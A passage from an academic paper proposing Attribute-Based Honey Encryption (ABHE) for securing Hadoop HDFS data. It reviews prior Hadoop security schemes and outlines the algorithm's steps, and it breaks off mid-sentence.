new encryption-decryption algorithm, i.e., the ABHE. As per the simulation results, this technique has shown marked improvements over encryption-decryption time in comparison with the already available algorithms including the Advanced Encryption Standard (AES) and AES with OTP (Mahmoud, Hegazy & Khafagy, 2018). The main contributions of paper are: • To carry out the in-depth study of big data processor, i.e., Hadoop and to assess its strength and weakness in terms of security and privacy; • To propose an ABHE, a secure and efficient algorithm executed on single and two DataNodes in Hadoop. Also, it ensures the full security against all side channel attacks, brute force attack and collusion attack; • To conduct experiments on test data to prove the efficacy of our proposed approach ABHE vs. other secure approches i.e., AES and AES-OTP; • The performance of proposed ABHE has been calculated in terms of File size, Encryption Time, Decryption Time, Throughput and Power Consumption; • The result shows that ABHE improves the execution time (total time taken for encryption and decryption of data) without affecting the size of original file. The rest of the paper has been divided into the following sections: • Section 2- enlists the pertinent research done in the domain of Big Data storage; Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 2/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 • Section 3- enunciates the suggested data encryption algorithm formulated on ABHE; • Section 4- presents the integration of the suggested algorithm with Hadoop environment. Furthermore, this section also provides a comparison between the efficacy of the suggested encryption approach vis-a-vis the two already available encryption algorithms namely; AES and AES with OTP with different sizes of text files ranging from MBs to GBs (64 MB, 128 MB, 512 MB, and 1 GB); • Section 5- underlines the significance of this research study; • Section 6- concludes the study. Related work Hadoop security Hadoop was created in 2008 with the intention to manage only huge amount of data confined to a specific condition. Thus, security issues weren’t the topmost preference (Yalla et al., 2016). For any data storage, Hadoop employs the user’s name. In the default node, there is no encryption among Hadoop, the client host as well as the HDFS. All the records are feeded into and constrained by a central server which is known as NameNode. Thus, HDFS lacks in security system against capacity servers. Hence, all information stored in this process is prone to be breached. Besides, a strong security model is also lacking between Hadoop and HDFS. The correspondence among DataNodes and among the end users and DataNodes remains encoded. It has no validation of clients or administration. Even after Yahoo concentrated on including authentications in 2009, Hadoop still had constrained approved abilities (Yalla et al., 2016). In 2013, the Apache Software Foundation defined venture Rhino to include security highlights (Yalla et al., 2016). Hadoop has the facility of data management that is scalable, rich in features and cost-effective for the masses. It has been a data platform of storing secret information for many organizations. The data stored in slots is saved but once it is brought together and made accessible for organizations over the masses, new security challenges arise. Big data in a Hadoop contains sensitive information related to financial data, corporate information, personal information and many such confidential data of clients, customers and employees. Hence, optimum protection of such data and ensuring that it remains free from any encroachment or tampering is of utmost significance (Rerzi, Terzi & Sagiroglu, 2015; Mehmood, Natgunanathan & Xiang, 2016; Bardi et al., 2014; Scrinivasan & Revthy, 2018; Derbeko et al., 2016; Gupta, Patwa & Sandhu, 2018). Big data: hadoop security solutions To elucidate the mentioned problems, a few activities have been appended to Hadoop to keep up with the equivalent (Vormetric Data Security, 2016; Jam, Akbari & Khanli, 2014): Perimeter Security: Network Security firewalls, Apache Knox gateway Authentication: Kerberos Authorization: E.g. HDFS permissions, HDFS ACL3s, MR ACLs Data Protection: Encryption at rest and encryption in motion. To provide security for data in HDFS, few available mechanisms are: Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 3/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 Authentication Authentication implies user’s identification. Authenticators are answerable for gathering testimonials by the API (Application Programming Interface) consumers, authenticating them and publicizing the success or failure status to the clients or chain providers. Because of this primary check, uncertain users won’t be able to access the cluster network and trusted network. Identification is regulated by the client host. For strong authentication, Hadoop uses Kerberos (Vormetric Data Security, 2016; Jam, Akbari & Khanli, 2014), and LDAP (Lightweight Directory Access), AD (Active Directory) integrated with Kerberos, establishing a single point of truth. Kerberos is a computer grid authentication protocol which generates ‘‘tickets’’ to allow the nodes communicating over an unprotected network to prove their identity to one another. The reliable server authentication key is placed in each node of the array to achieve authenticity of the Hadoop cluster node communication which will develop the HDFS array. It can effectively prevent non-trusted machines posing as internal nodes registered to the NameNode and then process data on HDFS. These components are used throughout the cluster. Hence, from the storage point of view, the legitimacy of the nodes in HDFS cluster could be guaranteed by Kerberos. It is completely entrusted by Hadoop for authentication between the client and server. Hadoop 1.0.0 version includes the Kerberos mechanism. Client requests an encrypted token of the authentication agent. A particular service can be requested from the server by using this. Password guessing attacks remains inoperative in Kerberos and thus multipart authentication is not provided (Zettaset, 2014). Authorization Authorization or restrict access is the method of securing the access within the data by the users as per the corporate policies or service provider. Authorization provider may also use an ACL (Access Control List) based authorization access called the Knox gateway (Vormetric Data Security, 2016; Jam, Akbari & Khanli, 2014) which is based on the evaluation of rules that comprises username, groups and IP (Internet Protocol) addresses. The aim of Hadoop’s developer is to design an authorization plan for the Hadoop platform to manage the authorization structure for Hadoop components. Data protection Data protection is a process to protect the data at rest or store and during transmission with the help of encryption and masking (Vormetric Data Security, 2016; Jam, Akbari & Khanli, 2014). Encryption is a technique which acts as an added layer in security in which data is encrypted (unreadable) during transmission or at rest. Hadoop employs the existing capabilities of data protection by providing the solution for data at rest and data discovery and masking. However, Hadoop’s security still needs some improvement. The work that has already been done by the researchers and practitioners on Hadoop is highly commendable. Several research studies have focussed on techniques to improvie the security of the data at rest as well as during transmission. Some of the relevant approaches have been discussed below: Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 4/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 Achieving secure, scalable and fine-grained data access control. The work combines techniques of Attribute-Based Encryption (ABE), proxy re-encryption, and lazy re- encryption (Yu et al., 2010b). This integrated method accomplishes fine grainedness, scalability, and data confidentiality during data access control in cloud computing. In this work, data files are encrypted using symmetric DEKs (symmetric data encryption key of a data files) and later, encrypted DEKs with KP-ABE (public key cryptography primitive for one-to-many communications). Such a dual encryption technique is called hybrid encryption. The KP-ABE technique is used for basic fuctions like the creation or deletion of files and user allocation with fine-grained data access control mechanism. User allocation is a big issue in this process and to achieve this, the author has combined proxy re-encryption with KP-ABE and distributed some tedious computational tasks to cloud servers. The cloud server stores secret key components and one dummy attribute corresponding to each user. When data owner does some modifications in the set of attributes while user allocation, the proxy re-encryption keys are generated and transferred to cloud servers. Later, cloud servers update their secret key on the basis of new re-encryption keys and re-encrypt the data files accordingly. Due to this, data owner is free from computation load during user allocation and do not need to stay online, since the cloud servers have already taken over this task after having the pre keys. Moreover, the burden of secret key updating and re-encryption of data file tasks are merged as single task using lazy re-encryption technique to save computation overhead of cloud servers during user revocation. Secure data sharing by using certificate-less proxy re-encryption scheme. This study stated that by using a public cloud, data can be shared securely. The research work presented a concept wherein a Certificate-Less Proxy Re-Encryption scheme (CL-PRE) is introduced (Xu, Wu & Zhang, 2012). According to this concept, an identity based public key is added to the proxy re-encryption technique. This removes the traditional identity problem of key escrow. This scheme requires no certificates for the authenticity of the public key. This scheme (CL-PRE) is used to decrease the figuring and correspondence cost for information proprietor. Fully homomorphic encryption. This research (Jam, Akbari & Khanli, 2014) proposed a design of trusted file system by combining the authentication agent technology with the cryptography fully homomorphic encryption technology.This is used for Hadoop which provides reliability and security from data, hardware, users and operations. This enables the user to prevent data breach along with enhanced efficiency of the application which is possible due to the encrypted data in the homomorphic encryption technology. Authentic agent technology also provides a range of techniques which are an integration of different mechanisms such as privilege separation and security audit that provides security of data in Hadoop system. Fully homomorphic encryption technique gives the ability to various users to carry out any operation on encrypted data with same results, provided the nature of the data remains Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 5/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 same, i.e., encrypted form throughout the operation. The data remains in encrypted form when processed with map reduce technique and stored safely in HDFS. A novel data encryption in HDFS. A new method for encrypting a file while uploading in HDFS has been proposed in this research work (Nguyen et al., 2013). The upload process is done along with the encryption process before uploading data on HDFS. In this method (Nguyen et al., 2013), the user selects a file to upload and provides a unique secret key for encryption of selected file. In this approach, user can feel the same experience when uploading a normal (without encryption) file to HDFS since the encryption is done in a fair manner. Also, this method utilises the characteristics of read/write operation to reduce the total time in HDFS. As an experiment, the author applied this technique on 32 MB file and observed that the encrypting upload and decrypting download process is usually 1.3 to 1.4 times faster than the conventional method. The major drawback of this approach is the key management because the keys are increased with respect to the users and to deal with them is quite challenging. Additionally, encrypting file sharing issue is also not possible with this approach. This proposed approach is lagging due to these two major issues and needs the dedicated attention of researchers and practitioners. Secure hadoop with encrypted HDFS using AES Encryption/Decryption. Security in Hadoop architecture is proposed in this paper by applying encryption and decryption techniques in HDFS (Park & Lee, 2013). In Hadoop, it is achieved by adding AES encrypt/decrypt function to Compression Codec. Experiments on Hadoop proved that the computation overhead is reduced by less than 7% when representative MapReduce job is done on encrypted HDFS. Triple encryption scheme for hadoop-based data. Cloud computing has the distinctive ability to provide users with customised, adaptable and trustworthy services at feasible costs. Hence, more and more users are availing of cloud computing. Given the rising demand of cloud appications, the protection of the cloud storage of data has become imperative. A method called novel triple encryption has been introduced in this paper (Yang, Lin & Liu, 2013) to achieve data protection at cloud storage. The Triple Encryption approach uses DEA (Data Encryption Algorithm) for HDFS files encryption, RSA for the data key encryption and finally IDEA for encrypting the user’s RSA private key. In this approach, DES and RSA based hybrid encryption technique is used to encrypt HDFS files and IDEA (International Data Encryption Algorithm) to encrypt the RSA based user key. In Hybrid encryption, DES algorithm is used to encrypt the files and get the Data key. This Data key is again encrypted by using RSA algorithm to provide additional security. The Data key can be decrypted by using private key only, therefore, it is always with the user. This method uses both symmetrical and asymmetrical encryption techniques, so called as hybrid encryption. This approach is tested and implemented in Hadoop based cloud data storage. Attribute-group based data security access. Due to various security issues, development and use of cloud storage has been decreased. To gain the confidence of user, author has defined an Attribute Group based data security access scheme to protect the data during Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 6/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 network and data sharing features in cloud storage services. In this scheme (Zhou & Wen, 2014), the data owner has limited user rights and re-encryption on the data node reduces the computational cost along with the management of the clients. It also reduces the complexity of property and rights management. Also, the author uses cipher text CP-ABE encryption algorithm to secure the data at cloud storage. The centralised management of key distribution and Name Node based CP-ABE algorithms have advantages like more transparency for the user and easy managemnt of the user key as compared to the data owner key distribution technique. Towards a trusted HDFS storage platform. The mechanism for the protection of a Hadoop infrastructure has been explained in this research (Cohen & Acharya, 2014) to deal with the concept of creating a reliable HDFS and safety hazards. Also, the researchers of this paper figure out the relation between security mechanisms and their effect on its performance (Cohen & Acharya, 2014). In the discussion, the authors implemented trusted computing concepts on a Hadoop considering a threat based environment. This framework is based on the Trusted Platform Module (TPG) and implemented into a base environment. Furthermore, the authors have utilized hardware key protections encryption scheme for Hadoop and AES-NI for accelerating the encryption and compared results after their implementation. In addition, the authors have claimed that there is 16% of the overhead reduction on encryption and 11% overhead reduction while decryption during experiment on simulated 128 MB block data with the AES-NI instructions. This approach provides a concrete layered security design in Hadoop. Security framework in G-Hadoop. An approach has been introduced where Hadoop’s MapReduce task runs simultaneously on multiple clusters in a Grid environment called G- Hadoop (Jam, Akbari & Khanli, 2014; Zhao et al., 2014). G-Hadoop reuses user authentication and job submission mechanism of Hadoop in a Grid environment. But initially, Hadoop’s user authentication and job submission mechanism have been designed for a single cluster in a non-Grid environment. Therefore, G-Hadoop is an extended version of Hadoop MapReduce task. It established a secure link for user and target cluster by following the secure shell protocol. A single dedicated connection is allotted to each participating user in a cluster and each user has to log on to only those clusters for which they are authenticated. Unlike Hadoop, they have to design a new security framework for G-Hadoop with various security solutions like public key cryptography and Globus Security Infrastructure. Concepts of proxy identity, user interface, and user instance, are embedded in this security framework to give better functions in a Grid environment (Jam, Akbari & Khanli, 2014; Zhao et al., 2014). This security framework introduced a single-sign on approach during user authentication and job submission process of the G-Hadoop. Also, this security approach protects the G-Hadoop system during threat environment, i.e., traditional attacks, abusing and misusing. The model of security framework is based on Globus Security Infrastructure (GSI). The utilization of SSL protocol for communication between the master node and the CA (Certification Authority) is also the key factor in security. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 7/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 GSI is based on single sign on process and uses asymmetric cryptography to provide a secure communication. GSI is a standard grid security which adapts to various techniques to provide necessary requirements in a Grid environment.This includes authentication, integrity of the messages and delegation of the authority from one entity to another in a grid environment. The user can only log-in into the master node after providing his authentication in the form of user name and password and submit jobs to the cluster. SSL handshaking is used in the security framework to establish a secure connection between DataNode and a NameNode. Elliptic curve cryptography based security scheme for hadoop distributed file system. This paper (Jeong & Kim, 2015) introduces a token based authentication scheme to protect HDFS stored data from security threats like breach and impersonation attacks. In this scheme, HDFS client authentication is done by the Data Node through block access token and functions as an extra layer of security along with the existing security, i.e., symmetric key HDFS authentication. Also, ECC encryption method is used for for authentication of anonymous keys and provides protection against external threats like security breaches or accidental exposures. This scheme adopts the hash chain of keys approach instead of a public key exchange approach which is a very common HDFS authentication protocol. Apart from providing protection to the sensitive HDFS data, it also improves the performance as compared to the public key-based HDFS authentication protocols. Secure multi sharing in big data storage. A method of privacy preserving security by using different mechanisms, i.e., anonymity, multiple receiver and conditional sharing is explained in this paper (Maheswari, Revathy & Tamilarasi, 2016). In this approach, to get the maximum security, Advanced Encryption Standard (AES) with Message Digest (MD5) & Data Encryption Standard (DES) have been employed to encrypt the data and authentication of data has been done using the DSA. Also, security and privacy preserving approaches have been used for the big data processing in the proposed framework. In this approach, owner uploads the data in cloud storage and after encryption, data is stored in HDFS. Thereafter, the data is shared among the multiple receivers. Cipher text is used to hide the identity of the sender and receiver whereas Anonymization mechanism is used to hide information of a particular receiver. A mechanism based on user and their received data category called conditional sharing starts working after receiving the receiver’s details. And, if the user’s category is matched with receiver’s data category, then the receiver gets authenticated and the transmission is started. Once the conditional sharing is complete, receiver retrieves the cipher text. The big data is shared with the cloud only if the result is secured. This proposed algorithm is verified for small data sets only. Towards best data security. In this paper, the author has described about the enormous information and its safety issues (Tian, 2017). Also, he has described about the existing ways to improve the security of enormous information like security hardening methodology with attributes relation graph, attribute selection methodology, content based access control model and a scalable multidimensional anonymization approach. The author of this paper (Tian, 2017) has proposed an intelligent security approach based on real time Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 8/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 data collection and threat analytics to detect the threat before the security breach takes place. HDFS data encryption based on ARIA algorithm. In this paper (Song et al., 2017), the author has presented an encryption scheme based on South Korea’s ARIA encryption scheme to protect the HDFS data in Hadoop. The ARIA algorithm uses 128-bit block for data encryption. In this approach, variable length data (not necessarily the 128-bit data) is divided into HDFS blocks. The proposed ARIA based algorithm provides the same level of data security at cost of only 23% performance degradation (during query processing) compared to AES algorithm. In addition, the researchers explained the future of ARIA based encryption scheme in genuine word applications like area based administrations and financial related data handling. Chaos-based simultaneous compression and encryption for hadoop. This paper (Usama & Zakari, 2017) introduced a framework based on a masking pseudorandom key stream to increase the encryption quality and provide robust encryption security & compression during read and write operation when integrated in HDFS. Also, the researchers have proposed a scheme for Hadoop using simultaneous compression and encryption to solve the implementation issues. The enhancement consequently improves the speed and efficiency of the algorithm. The proposed algorithm is highly compatible with Hadoop and provides efficient encryption security and compression during storage of data. Various experimental results concluded that the performance of the cluster in Hadoop gets reduced when compression and encryption operations are done separately because they need a significant volume of data for both the operations. This proposed algorithm can compress and encrypt the data simultaneously during MapReduce which reduces the required data space with minimum network resources. The proposed algorithm has passed edits security analysis test with a 99% confidence interval. Further, all NIST SP800-22 assays are successfully passed on cipher text generated from the plaintext. Data encryption based on AES and OTP. This research paper (Mahmoud, Hegazy & Khafagy, 2018) has highlighted a method to improve the upload and download time with reduction of encrypted file size by AES and OTP algorithms in HDFS. The authors performed encryption and decryption by two different ways which are based on AES and AES-OTP algorithms. The researchers chose cipher block chaining with the ECB mode of AES algorithm for handling HDFS blocks and OTP algorithm is used as a stream cipher. This keeps length of the plaintext same. For decryption, a private key is required which is always in the custody of user. In this method, when client has mentioned to transfer a record to HDFS, the application server creates an arbitrary key which is then separated into 2 keys for doing multi encoding and unscrambling by utilizing AES-OTP algorithm.Moreover, the authors have compared the file encryption time among Generic HDFS, encrypted HDFS by AES and HDFS encrypted file by AES with OTP. The results show that the AES with OTP algorithm increased the encrypted file size by 20% of the original file. The researchers also executed parallel decryption processing in Map Task to improve performance. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 9/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 Two-layer selective encryption using key derivation method. In this paper (Vimercati et al., 2007), the authors have explained the use of two-layer selective encryption technique based on key derivation method to implement the authorization policy (Atallah, Frikken & Blanton, 2005). In this method, the user assigns a secret key corresponding to each file which is encrypted using a symmetric key. The owner creates public tokens by using his secret key to allow any user further. Later, these public tokens along with token distribution task are transferred to the semi-trusted server. To derive the decryption key for a file, a minimal number of secret key per user and a minimal number of encryption key are required since the server cannot derive decryption key of any file with the available public tokens. The file creation and user grant/revocation operation gets complex as the number of users increases. This makes the suggested method unscalable (Yu et al., 2010a). Also, the user access privilege accountability is not supported in this method. Security and privacy aspects in mapreduce on clouds. Hadoop uses the filters in Vigiles (Ulu- soy et al., 2014) for a fine grained access control framework. These filters are coded in Java by security administrators and handled authorization by means of per-user assignment lists. On the other hand, in GuardMR, filters are allocated with limited roles on the basis of subject and a formal specification approach for the definition of filters is proposed. GuardMR and Vigiles rely on platform specific features for regulating the execution of a MapReduce task such as the Hadoop APIs and the Hadoop control flow and do not need the Hadoop source code customization. Vigiles and GuardMR have observed apractically low implementation overhead which means that they do not provide any support for context aware access control policies (Colombo & Ferrari, 2018). In (Derbeko et al., 2016) authors considered security and privacy challenges and urgent requirements in the scope of MapReduce and reviewed the existing security and privacy protocols for MapReduce including AccountableMR and TrustMR. The study also provides a comparison of several security algorithms, protocols and frameworks for MapReduce framework. Hybrid storage architecture and efficient mapreduce processing for unstructured data. In this paper (Lu et al., 2017), a technique called Hybrid Storage Architecture is proposed. With this technique, different kinds of data stores are integrated to the model and it also enables the strorage and process of the unstructured data.To execute MapReduce-based batch-processing jobs, various partitioning techniques are applied which are based on the said technique. The paper also demonstrates the utilization of the characteristics of different data stores for building a smart and an efficient system. The partitioning techniques leverages the unified storage system thus reducing the I/O cost and improves the large-scale data processing efficiency marginally. Towards privacy for mapreduce on hybrid clouds using information dispersal algorithm. In Cheikh, Abbes & Fedak (2014), to ensure privacy for MR in a hybrid computing environment based on the Grid’5000 platform, an algorithm known as information dispersal algorithm is required which comprises both untrusted infrastructures (such as, desktop grids and public clouds) and trusted infrastructures (such as, private clouds). Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 10/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 SEMROD: secure and efficient mapreduce over hybrid clouds. SEMROD (Oktay et al., 2015) firstly segregate the data into sensitive and non-sensitive data groups and then send the non-sensitive data to public clouds. Private and public clouds execute the map phase. However, the private cloud pulls all the outputs includng outputs of the map phase containing sensitive keys. Also, it executes the reduce phase operation only on record associated with sensitive keys andignores the non-sensitive keys. On the other hand, a public cloud execute the reduce phase on all outputs without knowing the sensitive keys. Finally, a sensitive key is generated by removing the duplicate entries with the help of filtering step. MtMR: ensuring mapreduce computation integrity with merkle tree-based verification. Proposed MtMR (Wang et al., 2015) is a method based on Merkle tree based verification to ensure the high integrity of the MapReduce tasks. It performs two rounds of Merkle tree based verification for the pre-reduction and restoration phases and covers MapReduce in a hybrid cloud environment. In each round, MtMR samples a small portion of reduces task input/output records on the private cloud and then applies the Merkle tree-based verification. The authors believe that MtMr can significantly improve the results while producing moderate performance overhead. Security threats to hadoop: data leakage attacks and investigation. This article (Fu et al., 2017) presents an automatic analysis method to find any data leakage attacks in Hadoop. It also presents a forensic framework including an on-demand data collection method in which it collects data from the machines in the Hadoop cluster on the forensic server and then analyzes the same. It can detect suspicious data leakage behaviors and give warnings and evidence to users using its automatic detection algorithm. And, collected evidences can help to find out the attackers and reconstruct the attack scenarios. The authors of the paper have also talked about the security concerns of HDFS (or Hadoop) and presented some possible data leakage attacks in it. VC3 and M2R in mapreduce computation. VC3 (Schuster et al., 2015) uses SGX to achieve confidentiality and integrity as part of the MapReduce programming model and requires a trusted hardware to perform computation. VC3 is not allowed to perform system calls but works and follows the executor interface of Hadoop. On the other hand, M2R (Dinh et al., 2015) offer mechanisms for dropping network traffic analysis leakage for MapReduce jobs. Preserving secret shared computations using mapreduce. The main reason of cloud insecurity is the loss of control over the data which can cause serious harm to the confidentiality of customer using cloud-computing. This problem can be overcome by providing secure computing environment and data storage (Sudhakar, Farquad & Narshimha, 2019). Also, techniques like encrypted representation and secret sharing techniques have emerged that offer verified security along with relatively efficient processing but are limited to only computing selection queries (Dolev et al., 2018). Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 11/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 Privacy preservation techniques in big data analytics. In this paper (Mohan Rao, Krishna & Kumar, 2018), authors have described about the various privacy threats and preservation techniques and models along with their limitations. The authors also proposed a Data lake based method for privacy preservation of unstructured data. Data lake is a repository to store raw format of the data either structured or unstructured, coming from different sources. Apache Flume is used for data ingestion from different sources and for their processing; data is transformed to HIVE tables. Also, Hadoop MapReduce using machine learning or vertically distributed can be applied to classify sensitive attributes of data whereas tokenization is used to map the vertically distributed data. Major findings from the literature After a cautious and focused study of various methodologies/approaches on big data and Hadoop security, the following observations have been made: • Hadoop stores the data on multiple nodes in a distributed manner while metadata and edit logs are stored on name nodes. The communication of data happens between client node and data node. Hence, multiple nodes are used in the Hadoop framework. The data is vulnerable to the hacks during the transmission, as it is not encrypted by default. Various communication protocols are used for internode communication. The available approaches or solutions for securing the data transmission include Kerberos, Simple Authentication and Security Layer (SASL), etc. However, these traditional approaches are not effective and sufficient enough to secure big data. • Data that is stored in fixed storage is known as data at rest or at storage level. Initially the stored data is prone to security attacks being not encrypted. Since, Hadoop works on the principal of spreading data across multiple nodes, consequently it is exposed to all insecure entry points. There are numerous methods available for data encryption in Hadoop. As Hadoop deals with large volume of data, it takes time in the encryption/decryption process. In order to maintain the performance, it is important to use an encryption technique that is fast enough to encrypt/decrypt. According to the studies, the encrypted data increases in the size almost by one and half time of the original data so the file upload time also gets affected. • Cloud providers need to design a cost-effective infrastructure that understands customers’ needs at all levels. To meet the requirements, it is needed to share the storage devices amongst the multiple users, which is known as multi-tendency. But sharing of resources results in security vulnerability. If proper security measures are not implemented, then the attacker is able to get easy access to the customer’s data, more so in the case of using the same physical device. • Companies would never know if the data is being used by someone else or not, because they don’t have direct control over their data. The lack of resource monitoring mechanisms creates many security issues. • Customers have to rely upon trust mechanism as an alternate security measure in which they have to control data and their resources. Cloud providers also provide certificates of operations of a secure provider to the customers. The certificates are well authenticated with established standards. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 12/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 • The security capabilities which are for ‘‘non big data’’ are needed for big data also to ensure client verification, management of data masking and encryption. MATERIALS & METHODS Data Encryption based on Attribute Based Honey Encryption (ABHE) In Hadoop, the inherent security feature is simple file permission and access control mechanisms. In such context, encryption is the best technology applied for securing HDFS files that are stored in DataNodes. Further, while processing MapReduce transferring files among DataNodes, encryption is the best solution. We can use cryptography for data protection in Hadoop, solution to data confidentiality and data integrity can be achieved using encryption technique. Cryptography keys can be categorised into: secret key cryptography and public key cryptography. Public key is known as asymmetric key cryptography (Dyer et al., 2013) while secret key is symmetric secret key cryptography which is used in stream ciphers for generation of password based encryption (Vinayak & Nahala, 2015). Encryption is mainly used to ensure secrecy. Encryption actually means secret writing which was initially used by ancient humans desiring to store secrets. In the past, encryption was available only to Generals and Emperors, but today it is used by nearly everyone, every day, every time whenever a credit card transaction, data storage and node to node communication is done, phone call is made, secure website is used; encryption techniques are used. Efficacy of an encryption algorithm depends on the key length (Ebrahim, Khan & Khalid, 2013). However, the available encryption algorithms are considered to be secure. But depending on the time and computing power, they are also susceptible to intrusions (Yin, lska & Zhou, 2017). The present encryption techniques are also beset with vulnerabilities, for instance, when decrypting with a wrongly guessed key, they yield an invalid looking plaintext message, while decrypting with the right key, they give a valid-looking plaintext message, confirming that the cipher-text message is correctly decrypted (Yin, lska & Zhou, 2017). In the same row, the honey encryption has been proposed by Jules and Ristenpart (Juels & Ristenpart, 2014). It is a concept which addresses vulnerability discussed in the previous paragraph and makes the password based encryption (PBE) more difficult to be broken by brute-force. Traditional encryption methods would show random text with no meaning at all when decrypting is done with wrong key and hence confirming its invalidity. On the contrary, honey encryption shows plausible looking text even when the key is wrong so the attacker won’t know if the guessed key is the right one. This unique approach slows down the attacker by fooling him and increases the complexity of password guessing as well as cracking process. There are few other technologies that share same term ‘‘honey’’. For example, Honeywords (Juels & Ristenpart, 2014) are a password that are used as decoy and generates an alert and notifies the administrator if used. Honeypots (Owezarski, 2015), Honeynet (Kim & Kim, 2012), and Honeyfarm (Jain & Sardana, 2012) are some other examples of luring systems. Honey encryption is related to Format-Preserving-Encryption (FPE) (Bellare et al., 2009) and Format-Transforming-Encryption (FTE) (Dyer et al., 2013). Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 13/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 In the FPE, both the plaintext and cipher-text message are same whereas it is not the case in FTE. In Honey Encryption, the messages are stored to a seed range in the seed space. Seed space and message space are different, so the cipher-text message space is different from the message space. Vinayak & Nahala (2015) used the HE scheme in MANETs to secure Ad-hoc networks against brute force attacks. Tyagi et al. (2015) applied HE technique to protect simplified text messages and credit card number that are susceptible to brute force attacks. Choi, Nam & Hur (2017) proposed schemes to solve human typo problems with message recovery security. Legitimate user may get confused seeing the different result than expected if there was some mistake in typing the password correctly. Edwin Mok et al. (Tan & Samsudin, 2018) came up with an eXtended Honey Encryption (XHE) by adding additional security measures on the encrypted data. However, Honey Encryption is still difficult to be applied in certain applications. For example, if the attacker has some clue about the data which is encrypted, suppose he has a part of the original data, he can easily tell which result is bogus and which is the correct data by matching the data with the decrypted result. However, it is possible to brute force honey encryption if the attacker has crib that must match with it to confirm its legitimacy (Wikipedia, 2019). It is still vulnerable and susceptible and further researches are going on. To overcome its limitations it must be expanded further by bringing out new security methods. This persuades the authors of this paper to develop an in-depth understanding of data security and privacy to solve issues related to Honey encryption. This paper aims to focus on fixing the vulnerabilities in Honey encryption and making it more secure. The authors have designed and implemented the attributed based Honey encryption as an extension of the public key encryption. This would enable the users to encrypt and decrypt messages based on users’ attributes. Only if the user matches the predefined attributes will the user be able to decrypt the message. It will help to keep the attacker away by blacklisting them. Proposed encryption algorithm The proposed encryption algorithm is a more secure version of honey encryption. The encryption algorithm provides two tier securities so that it can overcome the limitations prevailing in existing encryption techniques. The proposed algorithm is termed as Attribute- Based Honey Encryption (ABHE). Its 128/256 bits encryption algorithm will perform two layers of encryption in order to enhance security and effectiveness. The use of Cipher text Policy- Attribute Based Encryption (CP-ABE) (Zhao, Wei & Zhang, 2016; Varsha & Suryateja, 2014; Shobha & Nickolas, 2017) has been proposed in the algorithm. In the algorithm user’s private-key is superimposed with an access policy over a set of attributes within the system. A user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. Firstly, a set of attributes are chosen from the file to be encrypted; then a set of rules/policies are created for these attributes. On the basis of these rules, the given file is encrypted. Further, for more security the encrypted file is again protected by password. As this password is based on honey encryption, it creates a set of honey words. The encrypted file is passed on and may be received by different users. Now according to the Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 14/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 proposed algorithm, only the user having the desired set of attributes or the password would be able to decrypt the data. If someone wants to decrypt the encrypted file, he/she will have to enter the correct password. If password does not match, the user will be treated as intruder and previously set honey words will be displayed to him. If the password matches, the genuine user has to enter the private key which has been already created while encrypting the file. Again, if private key does not match, the user will not be allowed to access the file. On matching, the user will be able to successfully decrypt the file. The overall process will provide better security for files. ABHE algorithm for data security Input: Plain Text file Output: Encrypted file Step 01: Generate Private Key Step 01.a: Set of attributes is specified that describe the key. Step 01.b: Output private key ‘q’ Step 02: Encryption:(The algorithm encrypts File ‘F’ with policy ‘P’ and outputs the cipher-text) Step 02.a: Selects the file to be encrypted and set of attributes. Step 02.b: Encrypt a file F using a set of attributes occurring in the policy ‘P’ Step 03.c: Generate cipher-text CT Step03: Encrypted file (in step-02) is protected again by the password Step 04: Generate honey words and present it to user. Step 05: Decryption: (Decryption algorithm gets as input an encrypted file which is protected by the password. Cipher-text CT is produced by the encrypted algorithm, an access policy ‘P’ under which CT was encrypted.) Step 05.a: Input is encrypted file Step 05.b: Enter the password; if password matches, the cipher text CT is decrypted, otherwise intruder is detected. Step 05.c: User applies y number of attributes to compute private key Step 05.d: If key matches, file is decrypted and output the corresponding original file ‘F’, otherwise it outputs NULL. Authors have introduced a method to enhance the security level in which the data encryption and key management server are put together and provided a unique key for each application or cluster with HDFS encryption. When HDFS encrypted file entering into the Apache Hadoop environment, it remains in encrypted form at storage after processing. The results including intermediate results are always stored in encrypted form within the cluster in a file system having non HDFS form. At client level, data has been divided into smaller chunks by using parallel computing technique and stored at HDFS in encrypted form. Also, the Map Reduce tasks can be done on encrypted data directly and decrypt before processing after importing the corresponding decryption library. Input to a MapReduce job is divided into fixed-size pieces. These are the input splits which is a chunk of the input that is consumed by a single map. At Map function, the input data is Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 15/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 processed in decrypted form and stored output data in encrypted form into the HDFS. The Reduce function is executed on the intermediate results of Map function after decryption and the stored final output data in again encrypted form into the HDFS and provided access to the authorized clients only. Decryption process is replica of encryption process and both these methods are simple, cost-effective and scalable without deteriorating the performance, scalability or functionality. So, they are 